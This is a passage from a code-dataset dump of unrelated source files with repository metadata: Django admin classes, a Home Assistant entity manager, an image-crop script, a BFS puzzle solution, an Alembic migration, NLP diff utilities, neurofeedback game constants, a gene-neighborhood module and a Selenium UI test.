}
] |
11811149957 | import nested_admin
from django.contrib import admin
from cms.contexts.admin import AbstractCreatedModifiedBy
from . models import NavigationBar, NavigationBarItem, NavigationBarItemLocalization
class NavigationBarItemLocalizationInline(nested_admin.NestedStackedInline):
model = NavigationBarItemLocalization
extra = 0
classes = ['collapse']
sortable_field_name = ""
class NavigationBarItemInline(nested_admin.NestedStackedInline):
model = NavigationBarItem
raw_id_fields = ('parent', 'webpath',
'publication', 'inherited_content')
extra = 0
# classes = ['collapse']
inlines = (NavigationBarItemLocalizationInline,)
sortable_field_name = "order"
readonly_fields = ('created_by', 'modified_by',)
fieldsets = (
(None, {'fields': (('name', 'parent', 'order', 'is_active'),
)}),
('weblink', {'fields': (('webpath', 'url', 'publication')),
'classes':('collapse',),
}
),
('inherited_content', {'fields': (('inherited_content'),),
'classes':('collapse',)
}
)
)
@admin.register(NavigationBar)
class NavigationBarAdmin(AbstractCreatedModifiedBy,
nested_admin.NestedModelAdmin):
list_display = ('name', 'is_active', 'created')
search_fields = ('name',)
list_filter = ('created', 'modified')
readonly_fields = ('created_by', 'modified_by')
inlines = (NavigationBarItemInline,)
@admin.register(NavigationBarItem)
class NavigationBarItemAdmin(AbstractCreatedModifiedBy,
nested_admin.NestedModelAdmin):
list_display = ('menu', 'name', 'parent', 'is_active')
search_fields = ('name',)
list_filter = ('created', 'modified')
readonly_fields = ('created_by', 'modified_by')
inlines = (NavigationBarItemLocalizationInline,)
raw_id_fields = ('menu', )
| UniversitaDellaCalabria/uniCMS | src/cms/menus/admin.py | admin.py | py | 2,075 | python | en | code | 5 | github-code | 1 | [
{
"api_name": "nested_admin.NestedStackedInline",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "models.NavigationBarItemLocalization",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "nested_admin.NestedStackedInline",
"line_number": 15,
"usage_typ... |
24284540158 | """Bolted Entity Manager"""
from collections.abc import Mapping, MutableMapping
import logging
from typing import Any, Optional
import homeassistant.helpers.device_registry as hass_device_registry
import homeassistant.helpers.entity_registry as hass_entity_registry
from homeassistant.helpers.restore_state import (
ExtraStoredData,
RestoredExtraData,
RestoreEntity,
)
from .helpers import ObservableVariable
_LOGGER: logging.Logger = logging.getLogger(__package__)
class EntityManager:
"""Entity Manager."""
hass = None
platform_adders = {}
platform_classes = {}
registered_entities = {}
@classmethod
def init(cls, hass):
"""Initialize Class Variables"""
cls.hass = hass
cls.entity_registry = hass_entity_registry.async_get(hass)
cls.device_registry = hass_device_registry.async_get(hass)
@classmethod
def register_platform(cls, platform, adder, entity_class):
"""Register platform from Home Assistant"""
_LOGGER.debug(
"Platform %s Registered",
platform,
)
cls.platform_adders[platform] = adder
cls.platform_classes[platform] = entity_class
cls.registered_entities[platform] = {}
@classmethod
async def get(cls, bolted, platform, name, restore=False):
"""Get an Entity from Bolted"""
unique_id = f"{bolted.__class__.__module__}::{bolted.name}::{name}"
await cls.wait_platform_registered(platform)
if (
platform not in cls.registered_entities
or unique_id not in cls.registered_entities[platform]
):
await cls.create(bolted, platform, name, restore=restore)
return cls.registered_entities[platform][unique_id]
@classmethod
async def create(cls, bolted, platform, name, restore=False):
"""Create entity from Bolted."""
unique_id = f"{bolted.__class__.__module__}::{bolted.name}::{name}"
await cls.wait_platform_registered(platform)
_LOGGER.debug("Created New Entity %s %s", platform, unique_id)
new_entity = cls.platform_classes[platform](
cls.hass, bolted, unique_id, restore=restore
)
new_entity.entity_id = f"{platform}.{bolted.name}_{name}"
cls.platform_adders[platform]([new_entity])
await new_entity.wait_for_added()
cls.registered_entities[platform][unique_id] = new_entity
@classmethod
def remove(cls, entity):
entity.set(None, {})
# entity IDs don't stick with this. commenting for now.
# entity_id = entity.entity_id
# unique_id = entity.unique_id
# entity_platform, _ = entity_id.split('.', 1)
# _LOGGER.debug('Removing Entity %s', entity_id)
# cls.entity_registry.async_remove(entity_id)
# del cls.registered_entities[entity_platform][unique_id]
@classmethod
async def wait_platform_registered(cls, platform):
"""Wait for platform registration."""
if platform not in cls.platform_classes:
raise KeyError(f"Platform {platform} not registered.")
return True
@classmethod
def get_by_entity_id(cls, entity_id):
return cls.entity_registry.async_get(entity_id)
@classmethod
def get_device_id(cls, entity_id):
this_entity = cls.get_by_entity_id(entity_id)
if this_entity is None:
return None
return this_entity.device_id
@classmethod
def get_device_by_entity_id(cls, entity_id):
device_id = cls.get_device_id(entity_id)
if device_id is None:
return None
return cls.device_registry.async_get(device_id)
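# Rough usage sketch from inside a Bolted app (names here are assumed examples):
#   entity = await EntityManager.get(self, "sensor", "my_metric", restore=True)
#   entity.set(42, {"unit": "items"})  # `set` is provided by the platform entity class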
class BoltedEntity(RestoreEntity):
"""Base Class for all Bolted Entities"""
_attr_unique_id: Optional[str] = None
_attr_should_poll = False
_attr_extra_state_attributes: MutableMapping[str, Any]
_attr_bolted_state_attributes: MutableMapping[str, Any]
_restorable_attributes = None
def __init__(self, hass, bolted, unique_id, restore=False):
self.hass = hass
self.bolted = bolted
self._added = ObservableVariable(False)
self._should_restore = restore
self._attr_unique_id = unique_id
self._attr_bolted_state_attributes = {
"bolted_app": self.bolted.__class__.__module__,
"bolted_app_name": self.bolted.name,
}
_LOGGER.debug(
"Entity Initialized %s",
self.unique_id,
)
async def wait_for_added(self):
while self._added.value is not True:
_LOGGER.debug("Waiting for Entity to be added %s", self.unique_id)
await self._added.wait()
@property
def extra_state_attributes(self) -> Optional[Mapping[str, Any]]:
"""Return entity specific state attributes."""
attrs = {}
if hasattr(self, "_attr_extra_state_attributes"):
attrs.update(self._attr_extra_state_attributes)
if hasattr(self, "_attr_bolted_state_attributes"):
attrs.update(self._attr_bolted_state_attributes)
return attrs
@property
def extra_restore_state_data(self) -> Optional[ExtraStoredData]:
"""Return entity specific state data to be restored.
Implemented by platform classes.
"""
if self._restorable_attributes is None:
return None
restore = dict()
for key in self._restorable_attributes:
restore[key] = getattr(self, key)
return RestoredExtraData(restore)
async def async_added_to_hass(self):
"""Called when Home Assistant adds the entity to the registry"""
await super().async_added_to_hass()
if self._should_restore:
last_data = await self.async_get_last_extra_data()
self.bolted.logger.debug(
"Last Data %s: %s", self.unique_id, last_data
)
if last_data is not None:
for key, value in last_data.as_dict().items():
self.bolted.logger.debug(
"Restore %s = %s value", key, value
)
setattr(self, key, value)
self._added.value = True
self.async_update()
_LOGGER.debug(
"Entity %s Added to Hass as %s",
self.unique_id,
self.entity_id,
)
# USED INTERNALLY
#####################################
def async_update(self):
"""Request an entity update from Home Assistant"""
if self._added.value is True:
self.async_write_ha_state()
| dlashua/bolted | custom_components/bolted/entity_manager.py | entity_manager.py | py | 6,631 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "logging.Logger",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "logging.getLogger",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "homeassistant.helpers.entity_registry.async_get",
"line_number": 32,
"usage_type": "call"
},
{
... |
31278852115 | """
Center crop all the source images down to 512x512
"""
from PIL import Image
from PIL import ImageOps
import os
SOURCE_DIR = "source_images_blur"
OUT_DIR = "cropped_images_blur"
WIDTH = 512
HEIGHT = 512
os.makedirs(OUT_DIR, exist_ok=True)  # make sure the output directory exists
for f in os.listdir(SOURCE_DIR):
im = Image.open(os.path.join(SOURCE_DIR, f))
# resize image
w, h = im.size
aspect = w/h
if w > h:
new_h = HEIGHT
new_w = aspect*new_h
else:
new_w = WIDTH
new_h = (1/aspect)*new_w
im = im.resize((int(new_w), int(new_h)), Image.Resampling.BILINEAR).convert("RGB")
im = ImageOps.exif_transpose(im)
w, h = im.size
left = (w - WIDTH)/2
top = (h - HEIGHT)/2
right = (w + WIDTH)/2
bottom = (h + HEIGHT)/2
# Crop the center of the image
im = im.crop((left, top, right, bottom))
im.save(os.path.join(OUT_DIR, f)) | cpsiff/stable_diffusion | crop.py | crop.py | py | 847 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.listdir",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "PIL.Image.open",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number":... |
# Hide and Seek: 1-D BFS; from each x, try x-1, x+1 and x*2, adding +1 to the step count for each move
from collections import deque
import sys
input=sys.stdin.readline
n,k=map(int,input().split())
graph=[0]*100001
def bfs(n):
queue=deque()
queue.append(n)
while queue:
x=queue.popleft()
if x==k:
return graph[x]
for nx in (x-1,x+1,x*2):
if 0<=nx<100001 and not graph[nx]:
graph[nx]=graph[x]+1
queue.append(nx)
print(bfs(n)) | jeongkwangkyun/algorithm | BFS/1697.py | 1697.py | py | 465 | python | en | code | 0 | github-code | 1 | [
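# Sample run: input "5 17" -> prints 4 (5 -> 10 -> 9 -> 18 -> 17)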
{
"api_name": "sys.stdin",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "collections.deque",
"line_number": 11,
"usage_type": "call"
}
] |
9529021289 | """add original_taxa_id_to_taxa
Revision ID: 6938832cbce2
Revises: 24bc88e66a5b
Create Date: 2020-10-16 04:57:24.178833
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '6938832cbce2'
down_revision = '24bc88e66a5b'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('samples_taxa', sa.Column('original_taxon_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'samples_taxa', 'taxa_crosswalk', ['original_taxon_id'], ['id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'samples_taxa', type_='foreignkey')
op.drop_column('samples_taxa', 'original_taxon_id')
# ### end Alembic commands ###
| eODP/api | migrations/versions/6938832cbce2_add_original_taxa_id_to_taxa.py | 6938832cbce2_add_original_taxa_id_to_taxa.py | py | 863 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "alembic.op.add_column",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.Integer... |
3428235704 | import difflib
import re
from typing import Literal, TypedDict
import nltk
def segment_sentences_with_nltk(text: str) -> list[str]:
sent_detector = nltk.data.load("tokenizers/punkt/german.pickle")
return list(sent_detector.tokenize(text.strip()))
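# e.g. segment_sentences_with_nltk("Das ist ein Satz. Und noch einer.")
# would yield ["Das ist ein Satz.", "Und noch einer."] (assumes the nltk punkt data is installed)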
_PUNCTUATION_IN_MIDDLE_RE = re.compile(r"([\w\s,;:\-]*)([?!.])([\w\s,:;\-]*)")
_END_PUNCTIONATION_FROM_MIDDLE_RE = re.compile(r"([\w\s,;:\-]+)([?!]+)([\w\s,:;\-]+)")
_END_PUNCTIONATION_RE = re.compile(r'([\w\s,;:"\-()]+)[.?!]+(»|\"|\')*\Z')
_UPPERCASE_START_RE = re.compile(r"\A(«|\"|\')*[A-ZÄÖÜ]")
_LOWERCASE_START_RE = re.compile(r"\A[a-zäöü]")
_NON_WHITESPACE_RE = re.compile(r"\S+")
def contains_end_punctuation_in_the_middle(seq: str) -> bool:
return _PUNCTUATION_IN_MIDDLE_RE.search(seq) is not None
def retrieve_end_punctuation_from_the_middle(seq: str) -> str | None:
end_punctuation = _END_PUNCTIONATION_FROM_MIDDLE_RE.search(seq)
if end_punctuation:
return end_punctuation.group(2)
return None
def ends_with_end_punctuation(seq: str) -> bool:
return _END_PUNCTIONATION_RE.search(seq) is not None
def is_short_sequence(seq: str, length: int) -> bool:
return len(seq) < length
def starts_with_uppercase_letter(seq: str) -> bool:
uppercase_at_beginning = _UPPERCASE_START_RE.search(seq)
return uppercase_at_beginning is not None
def starts_with_lowercase_letter(seq: str) -> bool:
lowercase_at_beginning = _LOWERCASE_START_RE.search(seq)
return lowercase_at_beginning is not None
def calculate_sequence_similarity(a: str, b: str) -> float:
return difflib.SequenceMatcher(None, a, b).ratio()
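# e.g. calculate_sequence_similarity("kitten", "sitting") -> 2*4/(6+7) = 8/13 ≈ 0.615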
def retrieve_match_range(seq1: str, seq2: str) -> list[difflib.Match]:
seq_match = difflib.SequenceMatcher(None, seq1.strip(), seq2.strip())
return seq_match.get_matching_blocks()
def retrieve_mismatch_ranges(
seq1: str, seq2: str
) -> list[tuple[str, int, int, int, int]]:
seq_match = difflib.SequenceMatcher(None, seq1, seq2)
return seq_match.get_opcodes()
def check_overlap_with_seq_beginning(
s1: str, s2: str
) -> tuple[Literal[True], str, int] | tuple[Literal[False], str, None]:
# s1 is modifying seq and s2 is sen
index = 1
s1_beginning = s1[:index]
if s1_beginning not in s2:
return False, "", None
while s1_beginning in s2 and len(s1_beginning) < len(s1):
index += 1
s1_beginning = s1[:index]
return True, s1_beginning, index
def check_overlap_with_seq_end(
s1: str, s2: str
) -> tuple[Literal[True], str, int] | tuple[Literal[False], str, None]:
# s1 is modifying seq and s2 is sen
index = len(s1)
s1_end = s1[index:]
if s1_end not in s2:
return False, "", None
while s1_end in s2 and len(s1_end) < len(s1):
index -= 1
s1_end = s1[index:]
return True, s1_end, index
def retrieve_token_indices(
prev_sen: str, cur_sen: str
) -> tuple[list[tuple[str, int, int]], list[tuple[str, int, int]]]:
prev_toks_with_indices = [
(match.group(0), match.start(), match.end() - 1)
for match in _NON_WHITESPACE_RE.finditer(prev_sen)
]
cur_toks_with_indices = [
(match.group(0), match.start(), match.end() - 1)
for match in _NON_WHITESPACE_RE.finditer(cur_sen)
]
return prev_toks_with_indices, cur_toks_with_indices
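# e.g. retrieve_token_indices("ab cd", "x")[0] -> [("ab", 0, 1), ("cd", 3, 4)]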
# def identify_affected_tokens(
# prev_sen_toks: list, cur_sen_toks: list, edit_type: str
# ) -> list:
# affected_tokens = []
# if prev_sen_toks and cur_sen_toks:
# for pt, ct in itertools.zip_longest(prev_sen_toks, cur_sen_toks):
# print(ct)
# if pt["text"] != ct["text"]:
# if edit_type == "insertion":
# affected_tokens.append({"prev": None, "cur": ct})
# elif edit_type == "deletion":
# affected_tokens.append({"prev": pt, "cur": None})
# elif not prev_sen_toks and cur_sen_toks:
# for ct in cur_sen_toks:
# affected_tokens.append({"prev": None, "cur": ct})
# elif prev_sen_toks and not cur_sen_toks:
# for pt in prev_sen_toks:
# affected_tokens.append({"prev": pt, "cur": None})
# print("AFFECTED TOKENS:")
# print(affected_tokens)
# return affected_tokens
# def retrieve_affected_tokens(prev_sen, cur_sen) -> list:
# # affected_tokens is a list of tuples: previous word, current word with their indices
# affected_tokens = []
# prev_toks_with_indices, cur_toks_with_indices = retrieve_token_indices(
# prev_sen, cur_sen
# )
# _, mismatch_range, _ = retrieve_mismatch_range_for_sentence_pair(prev_sen, cur_sen)
# if mismatch_range:
# # as there is only one edit per TPSF (one sequence gets changed), there can always be only one mismatch range
# # if more than one mismatch range exists, merge all consecutive mismatch ranges together
# # multiple mismatch ranges occur if the inserted or deleted sequence is very short
# # and can be found at another position in the sentence which hasn't been edited
# mismatch_range = range(mismatch_range[0][0], mismatch_range[-1][-1] + 1)
# for pt, ct in itertools.zip_longest(
# prev_toks_with_indices, cur_toks_with_indices
# ):
# if pt is not None and ct is not None:
# if (
# mismatch_range[0] <= pt[2]
# and pt[1] <= mismatch_range[-1]
# or mismatch_range[0] <= ct[2]
# and ct[1] <= mismatch_range[-1]
# ): # TODO to test
# affected_token_pair = {"prev_tok": pt, "cur_tok": ct}
# affected_tokens.append(affected_token_pair)
# elif pt is None:
# pt = ("", None, None)
# if mismatch_range[0] <= ct[2] and ct[1] <= mismatch_range[-1]:
# affected_token_pair = {"prev_tok": pt, "cur_tok": ct}
# affected_tokens.append(affected_token_pair)
# elif ct is None:
# ct = ("", None, None)
# if mismatch_range[0] <= pt[2] and pt[1] <= mismatch_range[-1]:
# affected_token_pair = {"prev_tok": pt, "cur_tok": ct}
# affected_tokens.append(affected_token_pair)
# else:
# for ct in cur_toks_with_indices:
# pt = ("", None, None)
# affected_token_pair = {"prev_tok": pt, "cur_tok": ct}
# affected_tokens.append(affected_token_pair)
# return affected_tokens
# def filter_out_irrelevant_tokens(tokens: list) -> list:
# relevant_tokens = []
# for tok in tokens:
# if tokens['prev'][1] is not None and tokens['cur'][1] is not None:
# relevant_tokens.append(tok)
# return relevant_tokens
class TokenDict(TypedDict):
text: str
class TokensDict(TypedDict):
prev: TokenDict | None
cur: TokenDict | None
def check_edit_distance(tokens: TokensDict) -> int:
prev_tok = "" if tokens["prev"] is None else tokens["prev"]["text"]
cur_tok = "" if tokens["cur"] is None else tokens["cur"]["text"]
return nltk.edit_distance(prev_tok, cur_tok)
def retrieve_mismatch_range_for_sentence_pair(
prev_sen: str, cur_sen: str
) -> tuple[str | None, list[range], str]:
seq_match = difflib.SequenceMatcher(None, prev_sen, cur_sen)
prev_cur_match = seq_match.get_opcodes()
mismatch_range = []
edit = None
relevant = ""
# there is always one mismatch range, as TPSF capturing happens upon each edit,
# two separate edits on the same TPSF are not possible
# TODO make it more generic
for m in prev_cur_match:
if m[0] == "delete":
edit = m[0]
mismatch_range.append(range(m[1], m[2] + 1))
relevant = "prev"
elif m[0] == "insert":
edit = m[0]
mismatch_range.append(range(m[3], m[4] + 1))
relevant = "cur"
elif m[0] == "replace":
edit = m[0]
mismatch_range.append(range(max(m[1], m[3]), max(m[2] + 1, m[4] + 1)))
relevant = (
"prev"
if m[1] in mismatch_range[0] and m[2] in mismatch_range[-1]
else "cur"
)
return edit, mismatch_range, relevant
| mulasik/wta | wta/utils/nlp.py | nlp.py | py | 8,344 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "nltk.data.load",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "nltk.data",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "re.compile",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number"... |
34366237651 | # coding=utf-8
"""Constantes of ZETA Games first App"""
import pygame as pg
import numpy as np
from subprocess import Popen, PIPE
from threading import Thread
from subprocess import call
import logging  # needed by the FreqRange warning below
# Window customization
titre_fenetre = "ZETA GAMES"
image_icone = "images/zeta.png"
w_display = 480
h_display = 270
pg.font.init()
black = (0,0,0)
white = (255,255,255)
red = (255,0,0)
choice = ''
# Lists of the game's images
'''constants for streaming loop'''
buffersize = 200 # a bit more than one second of data,
bufferRS1 = []
bufferRS2 = []
bufferT = []
nb_channels = 4
nb_lines = 5 # there are 5 lines per sample, the sample number, and the 4 channels data
ind_2_remove_in_buffer1 = []
ind_time = []
ind_channel_1 = []
ind_channel_2 = []
ind_channel_3 = []
ind_channel_4 = []
ratios_ch1 = []
ratios_ch2 = []
ratios_ch3 = []
ratios_ch4 = []
mean_array_uvT = []
mean_array_uvRS2 = []
mean_array_uvRS1 = []
'''Load images, sounds libraries'''
buttonText = pg.font.Font('fonts/couture-bld.otf', 15) # font for Menu button
progressionTextFont = pg.font.Font('fonts/couture-bld.otf', 5) # font for questions
buttonTextHuge = pg.font.Font('fonts/couture-bld.otf', 20) # font for Menu button
image_home = 'images/homev011.png'
scoreDigitImages = ['images/0.png', 'images/1.png', 'images/2.png', 'images/3.png', 'images/4.png', 'images/5.png',
'images/6.png', 'images/7.png', 'images/8.png', 'images/9.png']
'''training game'''
backgroundImage = 'images/background.png' # which is a beach now
oldPosy = 180 # initial position of the Bird
# steps = 10
minDisplayY = 15 # min and max position that the bird can reach, 10px is top of the screen
maxDisplayY = 220
maxScore = 15 # score ruler is 15 max
minScore = 1
scoreT = 0
steps = 1.*buffersize/40
newPosy = maxDisplayY
veryOldPosy = maxDisplayY
oldPosy = maxDisplayY
# deltaPosy_1 = 1. * (newPosy - oldPosy) / steps
# deltaPosy_2 = 1. * (oldPosy - veryOldPosy) / steps
maxRatioAlphaOverDelta = 1
minRatioAlphaOverDelta = 0
coef_mad = 3
'''Resting state'''
timer = ['images/0.png', 'images/1.png', 'images/2.png', 'images/3.png', 'images/4.png', 'images/5.png',
'images/6.png', 'images/7.png', 'images/8.png', 'images/9.png']
restingStateDebutPath = 'images/restingStateDebut.png'
restingStateFinPath = 'images/restingStateFin.png'
restingStateDuration = 40 # in seconds
secRS2 = 0
secRS1 = 0
durationSessionInit = 350
durationSession = durationSessionInit
restingState1isDone = 0
endSessionImg = 'images/endSession.png'
'''Progression '''
progressionCoeff = 100 # coefficient that scales up the progression metric, since it is small (~0.001)
displayedMetric = 0
'''Navigation among the pages'''
# booleans for each window
punchinBall = 0
homeOn = 1
training = 0
restingState1 = 0
restingState2 = 0
'''FREQ'''
FreqRange = 'alpha'
freqMaxAlpha = 11
if FreqRange == '':
logging.warning('No frequency passed as argument')
if FreqRange == 'alpha':
freqRange = np.array([6, 13])
elif FreqRange == 'gamma':
freqRange = np.array([25, 50])
elif FreqRange == 'beta':
freqRange = np.array([12, 25])
elif FreqRange == 'theta':
freqRange = np.array([4, 7])
elif FreqRange == 'XXII_beta':
freqRange = np.array([15, 23])
elif FreqRange == 'XXII_gamma':
freqRange = np.array([38, 40])
''' Save buffer, to keep data records somewhere'''
saved_bufferRS1 = []
saved_bufferRS2 = []
saved_bufferRS1_ch1 = []
saved_bufferRS1_ch2 = []
saved_bufferRS1_ch3 = []
saved_bufferRS1_ch4 = []
saved_bufferRS2_ch1 = []
saved_bufferRS2_ch2 = []
saved_bufferRS2_ch3 = []
saved_bufferRS2_ch4 = []
saved_bufferT_ch1 = []
saved_bufferT_ch2 = []
saved_bufferT_ch3 = []
saved_bufferT_ch4 = []
sessionT = 0
sessionRS1 = 0
sessionRS2 = 0
sessionEnded = 0
'''for the fft '''
length = 200
NFFT = 200
fs_hz = 200
# overlap = NFFT/2 # useless for now
'''Neurofeedback loop'''
# newMean = 0 # useless now
# oldMean = 5E-13 # useless now
mean_array_alphaT = []
mean_array_deltaT = []
ratio_arrayT = []
mean_array_alphaRS1 = []
mean_array_deltaRS1 = []
ratio_arrayRS1 = []
mean_array_alphaRS2 = []
mean_array_deltaRS2 = []
ratio_arrayRS2 = []
print1 = 0
'''reorder channels index'''
# the following loop saves the index of the buffer that are interesting, without the channel id every 0 [nb_channels]
for ind in range(0, buffersize):
ind_channel_1.append(ind*4+1)
ind_channel_2.append(ind*4+2)
ind_channel_3.append(ind*4+3)
ind_channel_4.append(ind*4+4)
| zeta-technologies/workIP | constantes.py | constantes.py | py | 4,460 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pygame.font.init",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pygame.font",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "pygame.font.Font",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "pygame.font",
... |
23854783061 | """
Gene Neighborhoods
___________________
"""
import logging
import warnings
from os import mkdir, path
import click
import pandas as pd
# The helpers below are inferred from usage in this file; the exact module
# paths are assumptions and may need adjusting to the dram2 layout.
from skbio.io import read as read_sequence, write as write_sequence
from dram2.utils import get_genes_from_identifiers
from dram2.cli.context import DramContext, DEFAULT_KEEP_TMP, __version__
def find_neighborhoods(
annotations, genes_from_ids, distance_bp=None, distance_genes=None
):
# get neighborhoods as dataframes
neighborhood_frames = list()
for neighborhood_number, gene in enumerate(genes_from_ids):
gene_row = annotations.loc[gene]
scaffold_annotations = annotations.loc[
annotations["scaffold"] == gene_row["scaffold"]
]
# get neighbors based on bp
if distance_bp is not None:
right_dist = gene_row["end_position"] + distance_bp
left_dist = gene_row["start_position"] - distance_bp
neighborhood_annotations = scaffold_annotations.loc[
(scaffold_annotations["end_position"] >= left_dist)
& (scaffold_annotations["start_position"] <= right_dist)
]
else:
neighborhood_annotations = scaffold_annotations
# get neighbors based on annotations
if distance_genes is not None:
right_genes = gene_row["gene_position"] + distance_genes
left_genes = gene_row["gene_position"] - distance_genes
neighborhood_annotations = scaffold_annotations.loc[
(scaffold_annotations["gene_position"] >= left_genes)
& (scaffold_annotations["gene_position"] <= right_genes)
]
# add neighborhood number and neighborhood center as columns
neighborhood_annotations["neighborhood_number"] = neighborhood_number
neighborhood_annotations["neighborhood_center"] = [
i == gene for i in neighborhood_annotations.index
]
neighborhood_frames.append(neighborhood_annotations)
if len(neighborhood_annotations) == 0:
warnings.warn("")
# merge data frames and write to file
return pd.concat(neighborhood_frames)
def get_gene_neighborhoods(
input_file,
output_dir,
logger: logging.Logger,
genes=None,
identifiers=None,
categories=None,
genes_loc=None,
scaffolds_loc=None,
distance_genes=None,
distance_bp=None,
custom_distillate=None,
):
# check inputs, make output
if distance_genes is None and distance_bp is None:
raise ValueError("Must provide distance away in bp, genes or both.")
# get data
annotations = pd.read_csv(input_file, sep="\t", index_col=0)
genes_from_ids = get_genes_from_identifiers(
annotations,
genes=genes,
identifiers=identifiers,
categories=categories,
custom_distillate=custom_distillate,
)
if len(genes_from_ids) == 0:
raise ValueError(
"No genes were found based on your filtering parameters. No neighborhoods will be generated."
)
mkdir(output_dir)
neighborhood_all_annotations = find_neighborhoods(
annotations, genes_from_ids, distance_bp, distance_genes
)
neighborhood_all_annotations.to_csv(
path.join(output_dir, "neighborhood_annotations.tsv"), sep="\t"
)
logging.info("Neighborhood Annotations witten to tsv")
# filter files if given
if genes_loc is not None:
output_fasta_generator = (
i
for i in read_sequence(genes_loc, format="fasta")
if i.metadata["id"] in neighborhood_all_annotations.index
)
# TODO: potentially generate one fasta file per neighborhood
write_sequence(
output_fasta_generator,
format="fasta",
into=path.join(
output_dir, "neighborhood_genes.%s" % genes_loc.split(".")[-1]
),
)
logging.info("Gene Neighborhood fasta generated")
if scaffolds_loc is not None:
neighborhood_all_annotations["scaffold_mod"] = [
"%s_%s" % (row["fasta"], row["scaffold"])
for i, row in neighborhood_all_annotations.iterrows()
]
neighborhood_scaffolds = list()
for scaffold in read_sequence(scaffolds_loc, format="fasta"):
if (
scaffold.metadata["id"]
in neighborhood_all_annotations["scaffold_mod"].values
):
scaffold_frame = neighborhood_all_annotations.loc[
neighborhood_all_annotations["scaffold_mod"]
== scaffold.metadata["id"]
]
for neighborhood, neighborhood_frame in scaffold_frame.groupby(
"neighborhood_number"
):
neighborhood_frame = neighborhood_frame.sort_values(
"start_position"
)
neighborhood_scaffolds.append(
scaffold[
neighborhood_frame["start_position"][
0
]: neighborhood_frame["end_position"][-1]
]
)
write_sequence(
(i for i in neighborhood_scaffolds),
format="fasta",
into=path.join(output_dir, "neighborhood_scaffolds.fna"),
)
logging.info("Scaffolds Neighborhood fasta generated")
@click.command(
"neighbors",
context_settings=dict(help_option_names=["-h", "--help"]),
)
@click.pass_context
def neighbors_cmd(
ctx: click.Context,
):
"""
Pull Genes based on Their Neighborhoods
___
DRAM2 Can pull genes based on their proximity to other genes. I have not even written documentation for this yet.
"""
print("This command requires more work to function in dram2")
| rmFlynn/collection_of_typical_ocoli_samples | dram2/neighbors/__init__.py | __init__.py | py | 5,720 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "logging.Logger",
"line_number": 57,
"usage_type": "attribute"
},
{
"api_name": "logging.info",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "logging.info",
"li... |
7955053783 | from selenium import webdriver
from commom.BaseTest import Base1
from utils.ReadProperties import Read
from commom.WebDriverEngine import WebDriverEngine
from commom.ElementFinder import ElementFinder
import time
from selenium.webdriver.common.keys import Keys
import unittest
from utils.HTMLTestRunnerEN import HTMLTestRunner
# Test class; call the methods and pass parameters
class Test(unittest.TestCase):
    # Successful login √
def test_1_loginSuccess(self):
WebDriverEngine().type_scy("id=account","admin")
WebDriverEngine().type_scy("id=password","123456")
WebDriverEngine().click_scy("id=submit")
time.sleep(5)
    # Failed login
# def loginFail(self):
# WebDriverEngine().type_scy("id=account","admin")
# WebDriverEngine().type_scy("id=password","1234")
# WebDriverEngine().click_scy("id=submit")
# ElementFinder().q()
    # 9843 Contacts: edit group √
def test_2_editCall(self):
WebDriverEngine().click_scy("xpath=//a[contains(.,'联系人')]")
time.sleep(3)
# WebDriverEngine().enterFrame("iframe-dashboard")
WebDriverEngine().click_scy("xpath=/html/body/div/div/table/tbody/tr/td[4]/a[1]")
time.sleep(3)
WebDriverEngine().typeAndClear_scy("xpath=//input[@autocomplete='on']","kkk")
WebDriverEngine().click_scy("xpath=//button[contains(.,'保存')]")
# ElementFinder().refresh()
time.sleep(5)
WebDriverEngine().enterFrame("iframe-dashboard")
time.sleep(3)
    # Suspend a project √
def test_3_protect(self):
WebDriverEngine().click_scy("xpath=//a[contains(.,'项目')]")
time.sleep(3)
WebDriverEngine().click_scy("xpath=/html/body/div/div/table/tbody/tr[1]/td[9]/a[4]")
WebDriverEngine().click_scy("xpath=/html/body/div[2]/div/div/div[2]/button[1]")
WebDriverEngine().click_scy("xpath=/html/body/div[2]/div/div/div[2]/button")
    # 9836 Reimbursement status √
def test_4_money(self):
WebDriverEngine().click_scy("xpath=//a[contains(.,'审批')]")
time.sleep(3)
WebDriverEngine().click_scy("xpath=/html/body/nav[2]/ul/li[7]/a")
time.sleep(3)
WebDriverEngine().leaveFrame()
    # 9834 Desktop small-icon feature √
def test_5_smallTable(self):
WebDriverEngine().click_scy("xpath=//button[@id='showDesk']")
def t_send():
    # location of the test cases to execute
test_dir = Read().getValue('test_dir')
    # path where the test report is saved
test_report = Read().getValue('test_report')
    # find the test files to execute
discover = unittest.defaultTestLoader.discover(test_dir, pattern='ranzhi_test.py')
    # use HTMLTestRunner to build the test runner and generate an HTML report
now_time = time.strftime("%Y%m%d%H%M%S")
file_name = test_report + '\\' + now_time + 'result.html'
fp = open(file_name, 'wb')
    runner = HTMLTestRunner(stream=fp, title="Test Report", description="Runtime environment: firefox")
runner.run(discover)
fp.close()
